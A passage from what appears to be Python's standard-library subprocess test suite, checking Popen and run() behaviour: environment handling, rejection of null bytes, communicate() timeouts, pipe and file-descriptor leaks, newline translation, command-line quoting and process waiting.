# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
    """communicate() drives stdin, stdout and stderr concurrently."""
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stderr.write("pineapple");'
                          'sys.stdout.write(sys.stdin.read())'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    (stdout, stderr) = p.communicate(b"banana")
    self.assertEqual(stdout, b"banana")
    self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
    """communicate(timeout=...) raises TimeoutExpired; a later call without
    a timeout must still collect the child's complete output."""
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os,time;'
                          'sys.stderr.write("pineapple\\n");'
                          'time.sleep(1);'
                          'sys.stderr.write("pear\\n");'
                          'sys.stdout.write(sys.stdin.read())'],
                         universal_newlines=True,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    # 0.3s < the child's 1s sleep, so this must time out.
    self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
                      timeout=0.3)
    # Make sure we can keep waiting for it, and that we get the whole output
    # after it completes.
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout, "banana")
    self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
    # Test an expiring timeout while the child is outputting lots of data.
    # After the timeout, a second communicate() must still return every
    # byte the child wrote (4 chunks of 64 KiB).
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os,time;'
                          'sys.stdout.write("a" * (64 * 1024));'
                          'time.sleep(0.2);'
                          'sys.stdout.write("a" * (64 * 1024));'
                          'time.sleep(0.2);'
                          'sys.stdout.write("a" * (64 * 1024));'
                          'time.sleep(0.2);'
                          'sys.stdout.write("a" * (64 * 1024));'],
                         stdout=subprocess.PIPE)
    self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
    (stdout, _) = p.communicate()
    self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
    """Every pipe handed to Popen must be closed after communicate(),
    for all seven non-empty combinations of stdin/stdout/stderr pipes."""
    for stdin_pipe in (False, True):
        for stdout_pipe in (False, True):
            for stderr_pipe in (False, True):
                options = {}
                if stdin_pipe:
                    options['stdin'] = subprocess.PIPE
                if stdout_pipe:
                    options['stdout'] = subprocess.PIPE
                if stderr_pipe:
                    options['stderr'] = subprocess.PIPE
                if not options:
                    # no pipes at all: nothing to leak, skip this combo
                    continue
                p = subprocess.Popen(ZERO_RETURN_CMD, **options)
                p.communicate()
                if p.stdin is not None:
                    self.assertTrue(p.stdin.closed)
                if p.stdout is not None:
                    self.assertTrue(p.stdout.closed)
                if p.stderr is not None:
                    self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
    # communicate() should return None if no redirection is active
    p = subprocess.Popen([sys.executable, "-c",
                          "import sys; sys.exit(47)"])
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout, None)
    self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
    # communicate() with writes larger than pipe_buf
    # This test will probably deadlock rather than fail, if
    # communicate() does not work properly.
    # Burn a pipe pair first so the child's descriptors land on
    # different fd numbers than the parent's freshly created pipes.
    x, y = os.pipe()
    os.close(x)
    os.close(y)
    # The child echoes PIPE_MAX_SIZE bytes while also flooding stderr,
    # forcing communicate() to interleave reads and writes.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stdout.write(sys.stdin.read(47));'
                          'sys.stderr.write("x" * %d);'
                          'sys.stdout.write(sys.stdin.read())' %
                          support.PIPE_MAX_SIZE],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    string_to_write = b"a" * support.PIPE_MAX_SIZE
    (stdout, stderr) = p.communicate(string_to_write)
    self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
    # stdin.write before communicate()
    # Data written directly to p.stdin must be prepended to the
    # input later passed to communicate().
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stdout.write(sys.stdin.read())'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    p.stdin.write(b"banana")
    (stdout, stderr) = p.communicate(b"split")
    self.assertEqual(stdout, b"bananasplit")
    self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
    """'universal_newlines' and its alias 'text' behave identically:
    \\r, \\n and \\r\\n from the child are all normalized to \\n."""
    args = [
        sys.executable, "-c",
        'import sys,os;' + SETBINARY +
        'buf = sys.stdout.buffer;'
        'buf.write(sys.stdin.readline().encode());'
        'buf.flush();'
        'buf.write(b"line2\\n");'
        'buf.flush();'
        'buf.write(sys.stdin.read().encode());'
        'buf.flush();'
        'buf.write(b"line4\\n");'
        'buf.flush();'
        'buf.write(b"line5\\r\\n");'
        'buf.flush();'
        'buf.write(b"line6\\r");'
        'buf.flush();'
        'buf.write(b"\\nline7");'
        'buf.flush();'
        'buf.write(b"\\nline8");']
    for extra_kwarg in ('universal_newlines', 'text'):
        p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
                                      'stdout': subprocess.PIPE,
                                      extra_kwarg: True})
        with p:
            p.stdin.write("line1\n")
            p.stdin.flush()
            self.assertEqual(p.stdout.readline(), "line1\n")
            p.stdin.write("line3\n")
            # closing stdin lets the child's read() return
            p.stdin.close()
            self.addCleanup(p.stdout.close)
            self.assertEqual(p.stdout.readline(),
                             "line2\n")
            self.assertEqual(p.stdout.read(6),
                             "line3\n")
            self.assertEqual(p.stdout.read(),
                             "line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
    # universal newlines through communicate()
    # All three line-ending styles written by the child must come back
    # normalized to "\n".
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY +
                          'buf = sys.stdout.buffer;'
                          'buf.write(b"line2\\n");'
                          'buf.flush();'
                          'buf.write(b"line4\\n");'
                          'buf.flush();'
                          'buf.write(b"line5\\r\\n");'
                          'buf.flush();'
                          'buf.write(b"line6\\r");'
                          'buf.flush();'
                          'buf.write(b"\\nline7");'
                          'buf.flush();'
                          'buf.write(b"\\nline8");'],
                         stderr=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         universal_newlines=1)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    (stdout, stderr) = p.communicate()
    self.assertEqual(stdout,
                     "line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
    # universal newlines through communicate(), with only stdin
    # The child asserts it received the text unmodified; a failed
    # assert surfaces as a non-zero returncode.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY + textwrap.dedent('''
                           s = sys.stdin.readline()
                           assert s == "line1\\n", repr(s)
                           s = sys.stdin.read()
                           assert s == "line3\\n", repr(s)
                          ''')],
                         stdin=subprocess.PIPE,
                         universal_newlines=1)
    (stdout, stderr) = p.communicate("line1\nline3\n")
    self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
    # Test communicate(input=None) with universal newlines.
    #
    # We set stdout to PIPE because, as of this writing, a different
    # code path is tested when the number of pipes is zero or one.
    p = subprocess.Popen(ZERO_RETURN_CMD,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         universal_newlines=True)
    p.communicate()
    self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
    # universal newlines through communicate(), with stdin, stdout, stderr
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;' + SETBINARY + textwrap.dedent('''
                           s = sys.stdin.buffer.readline()
                           sys.stdout.buffer.write(s)
                           sys.stdout.buffer.write(b"line2\\r")
                           sys.stderr.buffer.write(b"eline2\\n")
                           s = sys.stdin.buffer.read()
                           sys.stdout.buffer.write(s)
                           sys.stdout.buffer.write(b"line4\\n")
                           sys.stdout.buffer.write(b"line5\\r\\n")
                           sys.stderr.buffer.write(b"eline6\\r")
                           sys.stderr.buffer.write(b"eline7\\r\\nz")
                          ''')],
                         stdin=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         universal_newlines=True)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    (stdout, stderr) = p.communicate("line1\nline3\n")
    self.assertEqual(p.returncode, 0)
    self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
    # Python debug build push something like "[42442 refs]\n"
    # to stderr at exit of subprocess.
    # Hence only a prefix check on stderr, not full equality.
    self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
    # Check that universal newlines mode works for various encodings,
    # in particular for encodings in the UTF-16 and UTF-32 families.
    # See issue #15595.
    #
    # UTF-16 and UTF-32-BE are sufficient to check both with BOM and
    # without, and UTF-16 and UTF-32.
    for encoding in ['utf-16', 'utf-32-be']:
        code = ("import sys; "
                r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
                encoding)
        args = [sys.executable, '-c', code]
        # We set stdin to be non-None because, as of this writing,
        # a different code path is used when the number of pipes is
        # zero or one.
        popen = subprocess.Popen(args,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 encoding=encoding)
        stdout, stderr = popen.communicate(input='')
        # decoded output with all newline styles normalized to \n
        self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
    """The 'errors' argument controls how undecodable child output
    (two raw 0x80 bytes here) is mapped into the returned text."""
    for errors, expected in [
        ('ignore', ''),
        ('replace', '\ufffd\ufffd'),
        ('surrogateescape', '\udc80\udc80'),
        ('backslashreplace', '\\x80\\x80'),
    ]:
        code = ("import sys; "
                r"sys.stdout.buffer.write(b'[\x80\x80]')")
        args = [sys.executable, '-c', code]
        # We set stdin to be non-None because, as of this writing,
        # a different code path is used when the number of pipes is
        # zero or one.
        popen = subprocess.Popen(args,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 encoding='utf-8',
                                 errors=errors)
        stdout, stderr = popen.communicate(input='')
        self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
    # Make sure we leak no resources
    # Strategy: exhaust the process's fd table on purpose, free a small
    # headroom, then spawn subprocesses repeatedly; any fd leaked per
    # spawn would hit EMFILE within a few iterations.
    if not mswindows:
        max_handles = 1026 # too much for most UNIX systems
    else:
        max_handles = 2050 # too much for (at least some) Windows setups
    handles = []
    tmpdir = tempfile.mkdtemp()
    try:
        for i in range(max_handles):
            try:
                tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
                handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
            except OSError as e:
                if e.errno != errno.EMFILE:
                    raise
                break
        else:
            self.skipTest("failed to reach the file descriptor limit "
                          "(tried %d)" % max_handles)
        # Close a couple of them (should be enough for a subprocess)
        for i in range(10):
            os.close(handles.pop())
        # Loop creating some subprocesses. If one of them leaks some fds,
        # the next loop iteration will fail by reaching the max fd limit.
        for i in range(15):
            p = subprocess.Popen([sys.executable, "-c",
                                  "import sys;"
                                  "sys.stdout.write(sys.stdin.read())"],
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            data = p.communicate(b"lime")[0]
            self.assertEqual(data, b"lime")
    finally:
        for h in handles:
            os.close(h)
        shutil.rmtree(tmpdir)
def test_list2cmdline(self):
    """Check list2cmdline quoting/escaping against known expansions."""
    cases = (
        (['a b c', 'd', 'e'], '"a b c" d e'),
        (['ab"c', '\\', 'd'], 'ab\\"c \\ d'),
        (['ab"c', ' \\', 'd'], 'ab\\"c " \\\\" d'),
        (['a\\\\\\b', 'de fg', 'h'], 'a\\\\\\b "de fg" h'),
        (['a\\"b', 'c', 'd'], 'a\\\\\\"b c d'),
        (['a\\\\b c', 'd', 'e'], '"a\\\\b c" d e'),
        (['a\\\\b\\ c', 'd', 'e'], '"a\\\\b\\ c" d e'),
        (['ab', ''], 'ab ""'),
    )
    for argv, expected in cases:
        with self.subTest(argv=argv):
            self.assertEqual(subprocess.list2cmdline(argv), expected)
def test_poll(self):
    """poll() is None while the child runs, then its exit status."""
    p = subprocess.Popen([sys.executable, "-c",
                          "import os; os.read(0, 1)"],
                         stdin=subprocess.PIPE)
    self.addCleanup(p.stdin.close)
    # child blocks in os.read until we write a byte
    self.assertIsNone(p.poll())
    os.write(p.stdin.fileno(), b'A')
    p.wait()
    # Subsequent invocations should just return the returncode
    self.assertEqual(p.poll(), 0)
def test_wait(self):
    """wait() returns the exit status and is idempotent."""
    proc = subprocess.Popen(ZERO_RETURN_CMD)
    first = proc.wait()
    # Subsequent invocations should just return the returncode
    second = proc.wait()
    self.assertEqual(first, 0)
    self.assertEqual(second, 0)
def test_wait_timeout(self):
    """wait(timeout=...) raises TimeoutExpired (whose message includes
    the timeout value); a longer wait then succeeds."""
    p = subprocess.Popen([sys.executable,
                          "-c", "import time; time.sleep(0.3)"])
    with self.assertRaises(subprocess.TimeoutExpired) as c:
        p.wait(timeout=0.0001)
    self.assertIn("0.0001", str(c.exception))  # For coverage of __str__.
    self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
    """A non-integer bufsize argument must raise TypeError."""
    self.assertRaises(TypeError,
                      subprocess.Popen, ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
    """bufsize=None (positional or keyword) behaves like the default."""
    proc = subprocess.Popen(ZERO_RETURN_CMD, None)
    self.assertEqual(proc.wait(), 0)
    # Again with keyword arg
    proc = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
    self.assertEqual(proc.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
    """Helper: write *line* to an echo child with bufsize=1 and assert the
    echoed value equals *expected* (empty if the write was not flushed).

    # subprocess may deadlock with bufsize=1, see issue #21332
    """
    with subprocess.Popen([sys.executable, "-c", "import sys;"
                           "sys.stdout.write(sys.stdin.readline());"
                           "sys.stdout.flush()"],
                          stdin=subprocess.PIPE,
                          stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL,
                          bufsize=1,
                          universal_newlines=universal_newlines) as p:
        p.stdin.write(line)  # expect that it flushes the line in text mode
        os.close(p.stdin.fileno())  # close it without flushing the buffer
        read_line = p.stdout.readline()
        with support.SuppressCrashReport():
            try:
                # closing the wrapper may raise since the fd is gone
                p.stdin.close()
            except OSError:
                pass
        p.stdin = None
    self.assertEqual(p.returncode, 0)
    self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
    """bufsize=1 in text mode line-buffers: the full line is echoed back."""
    sample = "line\n"
    self._test_bufsize_equal_one(sample, sample, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
    # line is not flushed in binary mode with bufsize=1.
    # we should get empty response
    line = b'line' + os.linesep.encode() # assume ascii-based locale
    # bufsize=1 in binary mode also emits a RuntimeWarning
    with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
        self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
    # see bug #5179: Popen leaks file descriptors to PIPEs if
    # the child fails to execute; this will eventually exhaust
    # the maximum number of open fds. 1024 seems a very common
    # value for that limit, but Windows has 2048, so we loop
    # 1024 times (each call leaked two fds).
    for i in range(1024):
        with self.assertRaises(NONEXISTING_ERRORS):
            subprocess.Popen(NONEXISTING_CMD,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
    # bpo-30121: Popen with pipes must close properly pipes on error.
    # Previously, os.close() was called with a Windows handle which is not
    # a valid file descriptor.
    #
    # Run the test in a subprocess to control how the CRT reports errors
    # and to get stderr content.
    try:
        import msvcrt
        msvcrt.CrtSetReportMode
    except (AttributeError, ImportError):
        self.skipTest("need msvcrt.CrtSetReportMode")
    # Route CRT warnings/errors to stderr so a bad close would show up
    # in the captured output below.
    code = textwrap.dedent(f"""
        import msvcrt
        import subprocess

        cmd = {NONEXISTING_CMD!r}
        for report_type in [msvcrt.CRT_WARN,
                            msvcrt.CRT_ERROR,
                            msvcrt.CRT_ASSERT]:
            msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
            msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)

        try:
            subprocess.Popen(cmd,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        except OSError:
            pass
    """)
    cmd = [sys.executable, "-c", code]
    proc = subprocess.Popen(cmd,
                            stderr=subprocess.PIPE,
                            universal_newlines=True)
    with proc:
        stderr = proc.communicate()[1]
    # empty stderr means no CRT assertion fired in the child
    self.assertEqual(stderr, "")
    self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
    # Issue #18851
    # A background thread keeps opening pipes while Popen fails; if the
    # error path double-closed an fd, it could close one of the thread's
    # fds, which the verification loop below would then detect.
    fds = []
    def open_fds():
        for i in range(20):
            fds.extend(os.pipe())
            time.sleep(0.001)
    t = threading.Thread(target=open_fds)
    t.start()
    try:
        with self.assertRaises(EnvironmentError):
            subprocess.Popen(NONEXISTING_CMD,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
    finally:
        t.join()
        exc = None
        for fd in fds:
            # If a double close occurred, some of those fds will
            # already have been closed by mistake, and os.close()
            # here will raise.
            try:
                os.close(fd)
            except OSError as e:
                exc = e
        if exc is not None:
            raise exc
def test_threadsafe_wait(self):
    """Issue21291: Popen.wait() needs to be threadsafe for returncode."""
    proc = subprocess.Popen([sys.executable, '-c',
                             'import time; time.sleep(12)'])
    self.assertEqual(proc.returncode, None)
    results = []

    def kill_proc_timer_thread():
        # record what the *other* thread observes at each step
        results.append(('thread-start-poll-result', proc.poll()))
        # terminate it from the thread and wait for the result.
        proc.kill()
        proc.wait()
        results.append(('thread-after-kill-and-wait', proc.returncode))
        # this wait should be a no-op given the above.
        proc.wait()
        results.append(('thread-after-second-wait', proc.returncode))

    # This is a timing sensitive test, the failure mode is
    # triggered when both the main thread and this thread are in
    # the wait() call at once.  The delay here is to allow the
    # main thread to most likely be blocked in its wait() call.
    t = threading.Timer(0.2, kill_proc_timer_thread)
    t.start()

    if mswindows:
        expected_errorcode = 1
    else:
        # Should be -9 because of the proc.kill() from the thread.
        expected_errorcode = -9

    # Wait for the process to finish; the thread should kill it
    # long before it finishes on its own.  Supplying a timeout
    # triggers a different code path for better coverage.
    proc.wait(timeout=support.SHORT_TIMEOUT)
    self.assertEqual(proc.returncode, expected_errorcode,
                     msg="unexpected result in wait from main thread")

    # This should be a no-op with no change in returncode.
    proc.wait()
    self.assertEqual(proc.returncode, expected_errorcode,
                     msg="unexpected result in second main wait.")

    t.join()
    # Ensure that all of the thread results are as expected.
    # When a race condition occurs in wait(), the returncode could
    # be set by the wrong thread that doesn't actually have it
    # leading to an incorrect value.
    self.assertEqual([('thread-start-poll-result', None),
                      ('thread-after-kill-and-wait', expected_errorcode),
                      ('thread-after-second-wait', expected_errorcode)],
                     results)
def test_issue8780(self):
    # Ensure that stdout is inherited from the parent
    # if stdout=PIPE is not used
    # (the grandchild's print must land on the child's stdout,
    # which we capture via check_output).
    code = ';'.join((
        'import subprocess, sys',
        'retcode = subprocess.call('
            "[sys.executable, '-c', 'print(\"Hello World!\")'])",
        'assert retcode == 0'))
    output = subprocess.check_output([sys.executable, '-c', code])
    self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
    """A failed CreateProcess must release the duplicated std handles.

    Three temp files serve as the child's stdin/stdout/stderr and an
    invalid command ("*") is spawned.  The spawn is expected to fail
    with OSError.  Cleanup now runs in a ``finally`` block: the
    original version only closed/removed the files inside ``except
    OSError``, so an unexpectedly *successful* spawn leaked all three
    fds and files and the trailing assertions failed with an opaque
    message.  ``assertRaises`` makes that failure mode explicit.
    """
    ifhandle, ifname = tempfile.mkstemp()
    ofhandle, ofname = tempfile.mkstemp()
    efhandle, efname = tempfile.mkstemp()
    try:
        # "*" is not a launchable command, so this must raise.
        with self.assertRaises(OSError):
            subprocess.Popen(["*"], stdin=ifhandle, stdout=ofhandle,
                             stderr=efhandle)
    finally:
        for handle, name in ((ifhandle, ifname),
                             (ofhandle, ofname),
                             (efhandle, efname)):
            os.close(handle)
            os.remove(name)
    self.assertFalse(os.path.exists(ifname))
    self.assertFalse(os.path.exists(ofname))
    self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
    """Issue 10963: communicate() must hide EPIPE from a huge stdin write."""
    proc = subprocess.Popen(ZERO_RETURN_CMD,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    for stream in (proc.stdout, proc.stderr, proc.stdin):
        self.addCleanup(stream.close)
    # child exits immediately; the 1 MiB write hits a closed pipe
    proc.communicate(b"x" * 2**20)
def test_repr(self):
    """repr(Popen) shows returncode and args, truncating long args."""
    path_cmd = pathlib.Path("my-tool.py")
    pathlib_cls = path_cmd.__class__.__name__
    # (args, shell, returncode, expected repr) — long commands are
    # elided with "..." after a fixed prefix length.
    cases = [
        ("ls", True, 123, "<Popen: returncode: 123 args: 'ls'>"),
        ('a' * 100, True, 0,
         "<Popen: returncode: 0 args: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...>"),
        (["ls"], False, None, "<Popen: returncode: None args: ['ls']>"),
        (["ls", '--my-opts', 'a' * 100], False, None,
         "<Popen: returncode: None args: ['ls', '--my-opts', 'aaaaaaaaaaaaaaaaaaaaaaaa...>"),
        (path_cmd, False, 7, f"<Popen: returncode: 7 args: {pathlib_cls}('my-tool.py')>")
    ]
    # mock _execute_child so no process is actually spawned
    with unittest.mock.patch.object(subprocess.Popen, '_execute_child'):
        for cmd, shell, code, sx in cases:
            p = subprocess.Popen(cmd, shell=shell)
            p.returncode = code
            self.assertEqual(repr(p), sx)
def test_communicate_epipe_only_stdin(self):
    """Issue 10963: communicate() hides EPIPE when only stdin is piped."""
    proc = subprocess.Popen(ZERO_RETURN_CMD, stdin=subprocess.PIPE)
    self.addCleanup(proc.stdin.close)
    # ensure the child is already gone before writing
    proc.wait()
    proc.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
                     "Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
                     "Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
                     "Requires os.getppid")
def test_communicate_eintr(self):
    # Issue #12493: communicate() should handle EINTR
    def handler(signum, frame):
        # no-op handler: its mere presence makes syscalls return EINTR
        pass
    old_handler = signal.signal(signal.SIGUSR1, handler)
    self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)

    args = [sys.executable, "-c",
            'import os, signal;'
            'os.kill(os.getppid(), signal.SIGUSR1)']
    for stream in ('stdout', 'stderr'):
        kw = {stream: subprocess.PIPE}
        with subprocess.Popen(args, **kw) as process:
            # communicate() will be interrupted by SIGUSR1
            process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage.  It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
                     "Linux specific")
def test_failed_child_execute_fd_leak(self):
    """Test for the fork() failure fd leak reported in issue16327."""
    fd_directory = '/proc/%d/fd' % os.getpid()
    fds_before_popen = os.listdir(fd_directory)
    with self.assertRaises(PopenTestException):
        PopenExecuteChildRaises(
                ZERO_RETURN_CMD, stdin=subprocess.PIPE,
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    # NOTE: This test doesn't verify that the real _execute_child
    # does not close the file descriptors itself on the way out
    # during an exception.  Code inspection has confirmed that.

    fds_after_exception = os.listdir(fd_directory)
    self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
    """FileNotFoundError from a missing executable names that executable."""
    with self.assertRaises(FileNotFoundError) as ctx:
        subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
    self.assertEqual(ctx.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
    """FileNotFoundError from a missing cwd names that directory."""
    with self.assertRaises(FileNotFoundError) as ctx:
        subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
    self.assertEqual(ctx.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
    """Popen and CompletedProcess support PEP 585 subscription."""
    self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
    self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
    """Tests for the high-level subprocess.run() convenience function."""

    def run_python(self, code, **kwargs):
        """Run Python code in a subprocess using subprocess.run"""
        argv = [sys.executable, "-c", code]
        return subprocess.run(argv, **kwargs)

    def test_returncode(self):
        # call() function with sequence argument
        cp = self.run_python("import sys; sys.exit(47)")
        self.assertEqual(cp.returncode, 47)
        # check_returncode() must raise for a non-zero status
        with self.assertRaises(subprocess.CalledProcessError):
            cp.check_returncode()

    def test_check(self):
        with self.assertRaises(subprocess.CalledProcessError) as c:
            self.run_python("import sys; sys.exit(47)", check=True)
        self.assertEqual(c.exception.returncode, 47)

    def test_check_zero(self):
        # check_returncode shouldn't raise when returncode is zero
        cp = subprocess.run(ZERO_RETURN_CMD, check=True)
        self.assertEqual(cp.returncode, 0)

    def test_timeout(self):
        # run() function with timeout argument; we want to test that the child
        # process gets killed when the timeout expires.  If the child isn't
        # killed, this call will deadlock since subprocess.run waits for the
        # child.
        with self.assertRaises(subprocess.TimeoutExpired):
            self.run_python("while True: pass", timeout=0.0001)

    def test_capture_stdout(self):
        # capture stdout with zero return code
        cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
        self.assertIn(b'BDFL', cp.stdout)

    def test_capture_stderr(self):
        # capture stderr independently of stdout
        cp = self.run_python("import sys; sys.stderr.write('BDFL')",
                             stderr=subprocess.PIPE)
        self.assertIn(b'BDFL', cp.stderr)

    def test_check_output_stdin_arg(self):
        # run() can be called with stdin set to a file
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        cp = self.run_python(
